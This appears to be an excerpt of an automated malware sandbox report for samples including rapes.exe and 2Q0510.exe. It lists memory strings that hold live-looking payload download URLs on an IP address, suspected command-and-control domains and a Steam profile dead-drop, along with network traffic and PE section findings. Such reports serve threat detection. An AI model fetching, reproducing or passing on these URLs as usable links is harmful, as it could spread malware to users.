Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5169948862/6z1l5Yn.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5169948862/6z1l5Yn.exeoT7
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/541893478/0uzaP1a.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/541893478/0uzaP1a.exeWu
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5419477542/ADFoyxP.exe
Source: rapes.exe, 0000000F.00000003.2116865557.0000000001745000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5765828710/7T7bCyA.exe
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5765828710/7T7bCyA.exeT7bCyA.exe
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5765828710/7T7bCyA.exeources
Source: rapes.exe, 0000000F.00000002.3742343881.000000000166B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6098950268/cuFIzyH.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6098950268/cuFIzyH.exe?
Source: rapes.exe, 0000000F.00000002.3742343881.000000000166B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6098950268/cuFIzyH.exeData
Source: rapes.exe, 0000000F.00000002.3742343881.0000000001757000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6691015685/EJmAkGq.exe
Source: rapes.exe, 0000000F.00000002.3742343881.0000000001757000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6691015685/EJmAkGq.exe1dac97d7aeef
Source: rapes.exe, 0000000F.00000002.3742343881.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6691015685/EJmAkGq.exeLMEMh
Source: rapes.exe, 0000000F.00000003.2862528432.0000000001757000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000003.2862273605.00000000062DA000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000003.2861208346.00000000062D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6989783370/ClhN6R8.exe
Source: rapes.exe, 0000000F.00000003.2862528432.0000000001757000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6989783370/ClhN6R8.exe1dac97d7yxe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7098980627/mAtJWNv.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7212159662/HmngBpR.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7212159662/HmngBpR.exeIu
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7834629666/v6Oqdnc.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7834629666/v6Oqdnc.exesu
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7868598855/zY9sqWs.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7868598855/zY9sqWs.exeat
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/fate/random.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/martin2/random.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/qqdoup/random.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/teamex_support/random.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/teamex_support/random.exec97d7aee7f
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/unique2/random.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/test/am_no.bat
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/test/am_no.bat7
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/test/exe/random.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/test/exe/random.exeSV
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: 1u58lIqYIC.exe, 00000026.00000002.2039881451.00000000036C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: P2SXMuh.exe, 00000017.00000003.2463367942.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arisechairedd.shop/JnsHY
Source: 2Q0510.exe, 0000000B.00000003.1973505983.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugildbett.top/
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, 2Q0510.exe, 0000000B.00000003.1973505983.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugildbett.top/bAuz
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugildbett.top/bAuzh
Source: 2Q0510.exe, 0000000B.00000003.1973505983.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugildbett.top/bAuzs
Source: 2Q0510.exe, 0000000B.00000003.1973505983.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugildbett.top/bAuzu
Source: 2Q0510.exe, 0000000B.00000003.1973505983.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugildbett.top:443/bAuzs
Source: cuFIzyH.exe, 00000010.00000002.2215111710.000000000165E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://catterjur.run/boSnzhu
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cjlaspcorne.icu/
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cjlaspcorne.icu/DbIps
Source: 2Q0510.exe, 0000000B.00000003.1973505983.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://defaulemot.run:443/jUSiaz
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/8
Source: P2SXMuh.exe, 00000017.00000003.2463367942.000000000109C000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fostinjec.today/LksNAzsh
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://htardwarehu.icu/
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://htardwarehu.icu/Sbdsa
Source: 2Q0510.exe, 0000000B.00000003.1973505983.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://htardwarehu.icu:443/Sbdsa
Source: 2Q0510.exe, 0000000B.00000003.1973505983.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu:443/bdWUaz
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://latchclan.shop/
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://latchclan.shop/Wjquw
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://latchclan.shop/Wjquw9
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://latchclan.shop/Wjquwh
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://latchclan.shop/Wjquwn
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://latchclan.shop:443/Wjquw
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://legenassedk.top/
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://legenassedk.top/bdpWOb
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://legenassedk.top/p
Source: 2Q0510.exe, 0000000B.00000003.1973505983.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://legenassedk.top:443/bdpWO
Source: cuFIzyH.exe, 00000010.00000002.2215111710.000000000165E000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000003.2463367942.000000000109C000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://modelshiverd.icu/bJhnsj
Source: rapes.exe, 0000000F.00000002.3750226935.00000000062E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top/aNzS
Source: 2Q0510.exe, 0000000B.00000003.1973505983.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top:443/aNzS
Source: cuFIzyH.exe, 00000010.00000003.2212662518.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, cuFIzyH.exe, 00000010.00000002.2215413900.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000003.2463367942.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: P2SXMuh.exe, 00000017.00000003.2463367942.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/;
Source: cuFIzyH.exe, 00000010.00000002.2215704935.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000003.2463367942.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000003.2463367942.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000003.2464872355.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.00000000010CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128
Source: cuFIzyH.exe, 00000010.00000003.2212662518.00000000016BA000.00000004.00000020.00020000.00000000.sdmp, cuFIzyH.exe, 00000010.00000003.2213465667.00000000016BC000.00000004.00000020.00020000.00000000.sdmp, cuFIzyH.exe, 00000010.00000002.2215704935.00000000016BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128.36
Source: P2SXMuh.exe, 00000017.00000003.2463367942.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000003.2464872355.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.00000000010CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611998223751281
Source: P2SXMuh.exe, 00000017.00000003.2463367942.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000003.2464872355.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.00000000010CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611998223751287
Source: P2SXMuh.exe, 00000017.00000003.2463367942.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000003.2464872355.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.00000000010CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128F
Source: cuFIzyH.exe, 00000010.00000003.2212662518.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, cuFIzyH.exe, 00000010.00000002.2215413900.00000000016A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128k
Source: P2SXMuh.exe, 00000017.00000003.2463367942.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000003.2464872355.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.00000000010CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128l
Source: cuFIzyH.exe, 00000010.00000003.2212662518.00000000016BA000.00000004.00000020.00020000.00000000.sdmp, cuFIzyH.exe, 00000010.00000003.2213465667.00000000016BC000.00000004.00000020.00020000.00000000.sdmp, cuFIzyH.exe, 00000010.00000002.2215704935.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000003.2465860963.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000003.2463367942.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2470149558.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199822375128
Source: cuFIzyH.exe, 00000010.00000002.2215111710.000000000165E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sterpickced.digital/
Source: P2SXMuh.exe, 00000017.00000003.2463367942.000000000109C000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sterpickced.digital/%
Source: P2SXMuh.exe, 00000017.00000003.2463367942.000000000109C000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sterpickced.digital/Vh
Source: P2SXMuh.exe, 00000017.00000003.2463367942.000000000109C000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sterpickced.digital/z_h
Source: cuFIzyH.exe, 00000010.00000002.2215111710.000000000165E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sterpickced.digital/z~

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: C:\Windows\twain_32\1u58lIqYIC.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

PE file contains section with special chars

Source: 3B05c.exe.0.dr	Static PE information: section name:
Source: 3B05c.exe.0.dr	Static PE information: section name: .idata
Source: 3B05c.exe.0.dr	Static PE information: section name:
Source: 1Z46i3.exe.1.dr	Static PE information: section name:
Source: 1Z46i3.exe.1.dr	Static PE information: section name: .idata
Source: 1Z46i3.exe.1.dr	Static PE information: section name:
Source: 2Q0510.exe.1.dr	Static PE information: section name:
Source: 2Q0510.exe.1.dr	Static PE information: section name: .idata
Source: rapes.exe.3.dr	Static PE information: section name:
Source: rapes.exe.3.dr	Static PE information: section name: .idata
Source: rapes.exe.3.dr	Static PE information: section name:
Source: EJmAkGq.exe.15.dr	Static PE information: section name:
Source: EJmAkGq.exe.15.dr	Static PE information: section name: .idata
Source: EJmAkGq.exe.15.dr	Static PE information: section name:
Source: random[1].exe.15.dr	Static PE information: section name:
Source: random[1].exe.15.dr	Static PE information: section name: .idata
Source: c353af48cf.exe.15.dr	Static PE information: section name:
Source: c353af48cf.exe.15.dr	Static PE information: section name: .idata
Source: random[1].exe0.15.dr	Static PE information: section name:
Source: random[1].exe0.15.dr	Static PE information: section name: .idata
Source: random[1].exe0.15.dr	Static PE information: section name:
Source: f86c60eea6.exe.15.dr	Static PE information: section name:
Source: f86c60eea6.exe.15.dr	Static PE information: section name: .idata
Source: f86c60eea6.exe.15.dr	Static PE information: section name:
Source: random[1].exe1.15.dr	Static PE information: section name:
Source: random[1].exe1.15.dr	Static PE information: section name: .idata
Source: random[1].exe1.15.dr	Static PE information: section name:
Source: f3f3c71039.exe.15.dr	Static PE information: section name:
Source: f3f3c71039.exe.15.dr	Static PE information: section name: .idata
Source: f3f3c71039.exe.15.dr	Static PE information: section name:
Source: random[1].exe2.15.dr	Static PE information: section name:
Source: random[1].exe2.15.dr	Static PE information: section name: .idata
Source: random[1].exe2.15.dr	Static PE information: section name:
Source: 477fbd5c21.exe.15.dr	Static PE information: section name:
Source: 477fbd5c21.exe.15.dr	Static PE information: section name: .idata
Source: 477fbd5c21.exe.15.dr	Static PE information: section name:
Source: cuFIzyH[1].exe.15.dr	Static PE information: section name:
Source: cuFIzyH[1].exe.15.dr	Static PE information: section name: .idata
Source: cuFIzyH[1].exe.15.dr	Static PE information: section name:
Source: cuFIzyH.exe.15.dr	Static PE information: section name:
Source: cuFIzyH.exe.15.dr	Static PE information: section name: .idata
Source: cuFIzyH.exe.15.dr	Static PE information: section name:
Source: cuFIzyH.exe0.15.dr	Static PE information: section name:
Source: cuFIzyH.exe0.15.dr	Static PE information: section name: .idata
Source: cuFIzyH.exe0.15.dr	Static PE information: section name:

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

